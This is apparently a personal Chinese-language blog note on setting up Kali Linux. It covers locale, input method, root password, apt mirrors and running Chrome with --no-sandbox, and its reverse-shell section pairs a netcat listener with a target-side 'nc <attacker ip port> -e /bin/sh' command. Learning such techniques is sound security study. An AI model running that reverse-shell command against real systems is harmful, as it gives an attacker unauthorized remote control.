kali

Last updated on 5 months ago

kali学习

语言

终端输入

1
dpkg-reconfigure locales      #dpkg -- debian package

空格选择cn,一路yes

安装中文输入法

apt-get install ibus ibus-pinyin
重启

root

1
sudo passwd root

换源

终端输入

1
2
sudo su    #进入root模式
vim /etc/apt/sources.list    #进入vim编辑器,输入i开始编辑,esc退出编辑,:wq保存

将原来的deb注释掉,加上新的源

1
2
3
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

更新软件列表(非root权限在命令行前加“sudo”)

1
2
3
4
5
apt-get update 更新索引
apt-get upgrade 更新软件
apt-get dist-upgrade 升级
apt-get clean 删除缓存包
apt-get autoclean 删除未安装的deb包

下载软件

下载chrome
在官方下载64位deb文件后,依次

1
2
3
sudo su       #进入管理员模式
apt install -f
dpkg -i filename.deb
1
2
3
vim /opt/google/chrome/google-chrome
注释掉exec -a “0 " " 0" "0""HERE/chrome” “$@
新加exec -a "$0" "$HERE/chrome" "$@" --user-data-dir --no-sandbox

反弹shell

目的

shell与终端

终端相当于一个前端页面,在终端输入指令,然后系统传输到shell,而直接执行shell就相当于在后端直接执行命令

image-20230607180611246

shell的位置是/usr/bin/sh

反弹shell的步骤

攻击机

使用netcat(network concatenate)网络连接

1
2
3
4
5
6
7
nc -lvp 4444(不一定非得是4444)

-l listen 监听端口,就是开放一个端口的意思

-v --verbose 输出详细信息

-p 端口

靶机

nc <攻击机ip 端口号> -e /bin/sh

-e execute 执行 重定向到shell

靶机可能没有nc工具,不建议记这个

wsl问题

1
2
netsh winsock reset
ssh-keygen -R ip
安全
kali
https://blog.yblue.top/2023/08/20/kali/
Posted on
August 20, 2023
Licensed under